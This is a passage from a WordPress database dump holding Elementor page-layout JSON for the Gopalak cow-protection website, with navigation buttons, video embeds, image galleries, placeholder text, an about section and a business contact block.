here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10026,1678,'_elementor_page_assets','a:0:{}'),(10028,1679,'_elementor_edit_mode','builder'),(10029,1679,'_elementor_template_type','wp-page'),(10030,1679,'_elementor_version','3.7.8'),(10031,1679,'_wp_page_template','elementor_canvas'),(10032,1679,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"woocommerce_gallery_thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1654,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\"},{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1628,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-1234.png\"}],\"background_repeat\":\"no-repeat\",\"background_slideshow_slide_duration\":2000,\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0300\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click 